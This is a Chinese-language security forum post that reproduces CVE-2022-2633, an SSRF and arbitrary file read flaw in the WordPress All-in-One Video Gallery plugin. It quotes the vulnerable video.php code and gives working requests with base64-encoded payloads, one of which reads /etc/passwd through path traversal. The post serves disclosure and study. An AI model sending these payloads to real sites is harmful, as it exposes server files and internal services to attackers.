问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633
# WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633 ## 漏洞描述 WordPress All-in-One Video 插件 Gallery video.php文件中存在SSRF以及任意文件读取漏洞...
WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633 =================================================================== 漏洞描述 ---- WordPress All-in-One Video 插件 Gallery video.php文件中存在SSRF以及任意文件读取漏洞,攻击者通过发送特定的请求包读取任意文件 漏洞影响 ---- WordPress All-in-One Video Gallery <= 2.6.0 插件名 --- All-in-One Video Gallery <https://downloads.wordpress.org/plugin/all-in-one-video-gallery.2.6.0.zip> 漏洞复现 ---- 对比漏洞修复的文件找到出现漏洞的文件 wp-content/plugins/all-in-one-video-gallery/public/video.php  这里接收 dl 参数,dl 参数不为 数字类型时,参数将 base64 解码传入 ```sql if ( is_numeric( $_GET['dl'] ) ) { $file = get_post_meta( (int) $_GET['dl'], 'mp4', true ); } else { $file = base64_decode( $_GET['dl'] ); } if ( empty( $file ) ) { die( esc_html__( 'Download file URL is empty.', 'all-in-one-video-gallery' ) ); exit; } ```  当传入的参数中不存在 http:// 或 https:// 时,参数 $formatted\_path 的值改变  当 $formatted\_path 为 url 时存在 SSRF漏洞,传入 base64编码 的目标URL就可以得到回显 ```sql /index.php/video/?dl=aHR0cHM6Ly93d3cuYmFpZHUuY29t ```  看向代码最后的片段,则存在任意文件读取漏洞  ```sql /index.php/video/?dl=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== ``` 
发表于 2024-07-12 18:48:45
阅读 ( 1687 )
分类:
服务器应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!